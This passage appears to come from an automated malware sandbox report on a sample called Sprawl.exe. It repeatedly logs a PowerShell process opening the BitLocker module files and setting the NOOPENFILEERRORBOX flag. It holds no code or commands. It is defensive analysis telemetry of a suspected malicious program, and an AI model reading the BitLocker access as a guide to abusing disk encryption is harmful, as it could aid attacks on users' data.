            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Sprawl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
